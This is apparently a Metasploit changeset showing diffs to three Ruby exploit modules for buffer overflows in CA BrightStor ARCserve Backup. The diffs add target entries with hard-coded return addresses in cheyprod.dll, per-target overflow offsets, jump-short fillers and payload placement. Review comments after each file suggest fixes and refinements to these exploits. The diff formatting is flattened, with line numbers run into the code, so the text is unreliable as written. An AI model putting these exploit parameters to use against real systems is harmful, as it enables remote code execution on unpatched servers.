Changeset 5471
- Timestamp:
- 04/09/08 08:04:15 (1 month ago)
- Files:
framework3/trunk/modules/exploits/windows/brightstor/discovery_tcp.rb
r4498 r5471 18 18 19 19 include Exploit::Remote::Tcp 20 include Exploit:: Remote::Seh20 include Exploit::Seh 21 21 22 22 def initialize(info = {}) … … 31 31 This module is based on the 'cabrightstor_disco' exploit by 32 32 Thor Doomen. 33 34 33 }, 35 'Author' => [ 'hdm' ],34 'Author' => [ 'hdm', 'patrick' ], 36 35 'License' => MSF_LICENSE, 37 36 'Version' => '$Revision$', … … 41 40 [ 'BID', '12536'], 42 41 [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'], 43 [ ' MIL', '15'],44 42 [ 'URL', 'http://milw0rm.com/exploits/1131'], 43 [ 'CVE', '2005-2535'], 45 44 ], 46 45 'Privileged' => true, … … 60 59 }, 61 60 ], 61 [ 62 'cheyprod.dll 07/21/2004', 63 { 64 'Platform' => 'win', 65 'Ret' => 0x23805d10, # pop/pop/ret 66 }, 67 ], 62 68 ], 63 69 'DisclosureDate' => 'Feb 14 2005', … … 71 77 72 78 def check 73 79 74 80 # The first request should have no reply 75 81 csock = Rex::Socket::Tcp.create( framework3/trunk/modules/exploits/windows/brightstor/discovery_udp.rb
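Review bot: The new entry in the 'Targets' table is named after a DLL build date, `'cheyprod.dll 07/21/2004'`, while message_engine.rb in this same changeset labels the identical pop/pop/ret address 0x23805d10 in that DLL as `'BrightStor ARCserve r11.1'`; the modules should share one naming scheme so the user can tell which product version a target corresponds to, for example `'BrightStor ARCserve r11.1 (cheyprod.dll 07/21/2004)'` here and in discovery_udp.rb. The include change from `Exploit::Remote::Seh` to `Exploit::Seh` presumably tracks a mixin rename elsewhere in the tree, which is worth confirming by loading the module, since nothing in this section shows the new namespace. The `check` method that starts at the end of the section continues outside it.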
r4419 r5471 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 28 28 request is sent to UDP port 41524, triggering a stack 29 29 overflow. 30 31 30 }, 32 'Author' => [ 'hdm' ],31 'Author' => [ 'hdm', 'patrick' ], 33 32 'License' => MSF_LICENSE, 34 'Version' => '$Revision $',33 'Version' => '$Revision', 35 34 'References' => 36 35 [ … … 39 38 [ 'CVE', '2005-0260'], 40 39 [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'], 41 [ 'MIL', '14'],42 43 40 ], 44 41 'Privileged' => true, … … 56 53 'Platform' => 'win', 57 54 'Ret' => 0x23808eb0, # call to edi reg 55 'Offset' => 968, 58 56 }, 59 57 ], 58 [ 59 'cheyprod.dll 07/21/2004', 60 { 61 'Platform' => 'win', 62 'Ret' => 0x2380a908, # call edi 63 'Offset' => 970, 64 }, 65 ], 60 66 ], 61 67 'DisclosureDate' => 'Dec 20 2004', … … 109 115 print_status("Trying target #{target.name}...") 110 116 111 buf = 'X' * 4096117 buf = rand_text_english(4096) 112 118 119 # Target 0: 120 # 113 121 # esp @ 971 114 122 # ret @ 968 115 123 # edi @ 1046 116 # end = 4092 124 # end = 4092 117 125 118 buf[ 968, 4] = [ target.ret ].pack('V')126 buf[target['Offset'], 4] = [ target.ret ].pack('V') 119 127 buf[1046, payload.encoded.length] = payload.encoded 120 128 framework3/trunk/modules/exploits/windows/brightstor/message_engine.rb
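Review bot: `'Version' => '$Revision',` drops the closing `$` of the `$Revision$` keyword, so the keyword will no longer be expanded and the module's version becomes the literal string; restore `'Version' => '$Revision$',`. The new per-target `'Offset'` is only used for the return address at `buf[target['Offset'], 4]`, while the payload is still written at the fixed index 1046 and the offset comment block is explicitly labelled `# Target 0:`; if the second target's layout is shifted as its offset of 970 suggests, the payload position may need to move with it, which should be verified against that target rather than assumed. A short `# Target 1: ret @ 970` beside the existing block would at least document the difference. The exploit method continues outside this section.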
r4419 r5471 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 24 24 'Description' => %q{ 25 25 This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 26 11. 5. By sending a specially crafted RPC request, an attacker could overflow the27 buffer and execute arbitrary code.26 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow 27 the buffer and execute arbitrary code. 28 28 }, 29 'Author' => [ 'MC' ],29 'Author' => [ 'MC', 'patrick' ], 30 30 'License' => MSF_LICENSE, 31 31 'Version' => '$Revision$', … … 34 34 [ 'CVE', '2007-0169' ], 35 35 [ 'BID', '22005' ], 36 [ 'OSVDB', '31319' ], # There is a lot of confusion 36 37 ], 37 38 'Privileged' => true, … … 49 50 'Targets' => 50 51 [ 51 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ], 52 [ 'BrightStor ARCserve r11.5 SP2', { 'Ret' => 0x2380a47d } ], 53 ], 52 [ 'BrightStor ARCserve r11.1', { 'Ret' => 0x23805d10 } ], #p/p/r cheyprod.dll 07/21/2004 53 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ], 54 [ 'BrightStor ARCserve r11.5 SP2', { 'Ret' => 0x2380a47d } ], 55 ], 54 56 'DisclosureDate' => 'Jan 11 2007', 55 'DefaultTarget' => 0))57 'DefaultTarget' => 1)) 56 58 57 59 register_options([ Opt::RPORT(6503) ], self.class) … … 67 69 print_status("Bound to #{handle} ...") 68 70 69 filler = rand_text_english(616) + "\xeb\x06"+ rand_text_english(2) + [target.ret].pack('V')71 filler = rand_text_english(616) + Rex::Arch::X86.jmp_short(6) + rand_text_english(2) + [target.ret].pack('V') 70 72 71 73 sploit = NDR.string(filler + payload.encoded + "\x00") + NDR.long(0) … … 83 85 84 86 end 85 end 87 end
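Review bot: The new reference line `[ 'OSVDB', '31319' ], # There is a lot of confusion` leaves the reader guessing what is confused; the comment should state it, along the lines of `# OSVDB 31319 — mapping to the CVE/BID above is unverified (<describe the discrepancy>)`. `'DefaultTarget' => 1` correctly keeps r11.5 as the default after the r11.1 entry is inserted at index 0, but a trailing `# r11.5` would make the renumbering obvious to the next editor. The r11.1 target's comment `#p/p/r cheyprod.dll 07/21/2004` also differs in style from the rest of the file; `# pop/pop/ret in cheyprod.dll 07/21/2004` matches the wording used in the other two modules of this changeset.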
